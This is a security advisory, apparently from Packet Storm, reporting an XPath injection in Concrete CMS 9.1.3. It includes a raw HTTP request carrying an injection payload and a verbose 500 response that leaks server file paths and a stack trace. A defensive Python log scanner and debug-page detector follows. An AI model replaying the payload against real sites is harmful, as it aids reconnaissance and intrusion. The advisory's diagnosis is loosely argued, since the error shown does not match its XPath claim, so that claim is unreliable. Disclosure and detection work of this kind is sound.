Packet Storm ID: PACKETSTORM:170041 (published Nov 29, 2022)

Concrete CMS 9.1.3 XPATH Injection

Date: 2022-11-29
Author: nu11secur1ty
Source: packetstormsecurity.com
## Title: concretecms-9.1.3 Xpath injection  
## Author: nu11secur1ty  
## Date: 11.28.2022  
## Vendor: https://www.concretecms.org/  
## Software: https://www.concretecms.org/download  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3  
  
## Description:  
The URL path folder `3` appears to be vulnerable to XPath injection attacks.  
The test payload `50539478' or 4591=4591--` was submitted in the URL  
path folder `3`, and an XPath error message was returned.  
An attacker can flood the system with requests that trigger this  
vulnerability until the returned error messages reveal the actual paths  
of all the content of this system, content that is stored on some  
internal or external server.  
  
## STATUS: HIGH Vulnerability  
  
[+] Exploits:  
00:  
```http
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```  
  
[+] Response:  
  
```http  
HTTP/1.1 500 Internal Server Error  
Date: Mon, 28 Nov 2022 15:32:22 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30  
X-Powered-By: PHP/7.4.30  
Connection: close  
Content-Type: text/html;charset=UTF-8  
Content-Length: 592153  
  
<!DOCTYPE html><!--  
  
  
Whoops\Exception\ErrorException: include(): Failed opening  
'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php'  
for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR')  
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php  
on line 26  
Stack trace:  
1. Whoops\Exception\ErrorException->()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26  
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26  
3. Stash\Driver\FileSystem\NativeEncoder->deserialize()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201  
4. Stash\Driver\FileSystem->getData()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631  
5. Stash\Item->getRecord()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321  
6. Stash\Item->executeGet()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252  
7. Stash\Item->get()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346  
8. Stash\Item->isMiss()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67  
9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356  
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601  
11. Laminas\I18n\Translator\Translator->loadMessages()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434  
12. Laminas\I18n\Translator\Translator->getTranslatedMessage()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349  
13. Laminas\I18n\Translator\Translator->translate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69  
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27  
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47  
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267  
17. Concrete\Core\Block\View\BlockView->renderViewContents()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164  
18. Concrete\Core\View\AbstractView->render()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853  
19. Concrete\Core\Area\Area->display()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128  
20. Concrete\Core\Area\GlobalArea->display()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11  
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125  
22. Concrete\Core\View\View->inc()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4  
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329  
24. Concrete\Core\View\View->renderTemplate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291  
25. Concrete\Core\View\View->renderViewContents()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164  
26. Concrete\Core\View\AbstractView->render()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19  
27. Concrete\Controller\SinglePage\PageNotFound->view()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318  
28. call_user_func_array()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318  
29. Concrete\Core\Controller\AbstractController->runAction()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188  
30. Concrete\Core\Http\ResponseFactory->controller()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95  
31. Concrete\Core\Http\ResponseFactory->notFound()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390  
32. Concrete\Core\Http\ResponseFactory->collectionNotFound()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234  
33. Concrete\Core\Http\ResponseFactory->collection()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132  
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60  
35. Concrete\Core\Http\DefaultDispatcher->dispatch()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39  
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39  
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36  
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36  
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35  
43. Concrete\Core\Http\Middleware\CookieMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29  
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86  
47. Concrete\Core\Http\Middleware\MiddlewareStack->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85  
48. Concrete\Core\Http\DefaultServer->handleRequest()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125  
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102  
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45  
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2  
  
  
--><html>  
<head>  
<meta charset="utf-8">  
<meta name="robots" content="noindex,nofollow"/>  
<meta name="viewport" content="width=device-width,  
initial-scale=1, shrink-to-fit=no"/>  
<title>Concrete CMS has encountered an issue.</title>  
  
<style>body {  
font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  
color: #131313;  
background: #eeeeee;  
padding:0;  
margin: 0;  
max-height: 100%;  
  
text-rendering: optimizeLegibility;  
}  
a {  
text-decoration: none;  
}  
  
.Whoops.container {  
position: relative;  
z-index: 9999999999;  
}  
  
.panel {  
overflow-y: scroll;  
height: 100%;  
position: fixed;  
margin: 0;  
left: 0;  
top: 0;  
}  
  
.branding {  
position: absolute;  
top: 10px;  
right: 20px;  
color: #777777;  
font-size: 10px;  
z-index: 100;  
}  
.branding a {  
color: #e95353;  
}  
  
header {  
color: white;  
box-sizing: border-box;  
background-color: #2a2a2a;  
padding: 35px 40px;  
max-height: 180px;  
overflow: hidden;  
transition: 0.5s;  
}  
  
header.header-expand {  
max-height: 1000px;  
}  
  
.exc-title {  
margin: 0;  
color: #bebebe;  
font-size: 14px;  
}  
.exc-title-primary, .exc-title-secondary {  
color: #e95353;  
}  
  
.exc-message {  
font-size: 20px;  
word-wrap: break-word;  
margin: 4px 0 0 0;  
color: white;  
}  
.exc-message span {  
display: block;  
}  
.exc-message-empty-notice {  
color: #a29d9d;  
font-weight: 300;  
}  
  
.......  
  
```  
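The request above is easy to spot in web server logs, and the response shows what a leaking debug page looks like. The following is an added defensive example, not part of the advisory: it scans Apache combined-format access log lines (constructed here) for path segments shaped like the probe (a quote followed by a boolean tautology, or a trailing `--` comment marker), rates a 500 on such a path higher, and checks a response body for the Whoops debug-page fingerprint that discloses absolute file paths.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not taken from the advisory). The first mirrors the
# shape of the advisory's request; the others are benign traffic, including a
# legitimate apostrophe in a slug that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Nov/2022:15:32:22 +0000] "GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1" 500 592153
203.0.113.8 - - [28/Nov/2022:15:33:01 +0000] "GET /concrete-cms-9.1.3/index.php/ccm/assets/localization/moment/js HTTP/1.1" 200 4121
203.0.113.9 - - [28/Nov/2022:15:33:40 +0000] "GET /index.php/blog/o'reilly-interview HTTP/1.1" 200 8812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Quote + boolean operator + "x=y" comparison, or a trailing "--" comment marker.
INJECT_RE = re.compile(r"""['"]\s*(or|and)\s+\S+\s*=\s*\S+|--\s*$""", re.IGNORECASE)

# Markers of the Whoops debug page seen in the advisory's 500 response.
DEBUG_TITLE = "<title>Concrete CMS has encountered an issue.</title>"
ABS_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\"]+|/var/www/[^\s'\"]+")


def suspicious_segments(path):
    """Return URL-decoded path segments that carry injection-style metacharacters."""
    decoded = unquote(path.split('?', 1)[0])
    return [seg for seg in decoded.split('/') if seg and INJECT_RE.search(seg)]


def scan_log(text):
    """Flag requests whose path contains a suspicious segment; a 500 on such a
    path suggests the payload reached application code rather than a 404 route."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_segments(m['path'])
        if hits:
            findings.append({'ip': m['ip'], 'status': int(m['status']),
                             'segments': hits,
                             'severity': 'high' if m['status'] == '500' else 'medium'})
    return findings


def leaks_stack_trace(body):
    """True when a response body is the verbose debug page and exposes file paths."""
    return DEBUG_TITLE in body and "Stack trace:" in body and bool(ABS_PATH_RE.search(body))
```

Run `scan_log(SAMPLE_LOG)` against real logs by streaming lines from the access log; a `high` finding paired with `leaks_stack_trace` on the stored response body means debug output is enabled in production and should be switched off.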
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)  
  
## Proof and Exploit:  
[href](https://streamable.com/4f60ka)  
  
## Time spent  
`03:00:00`  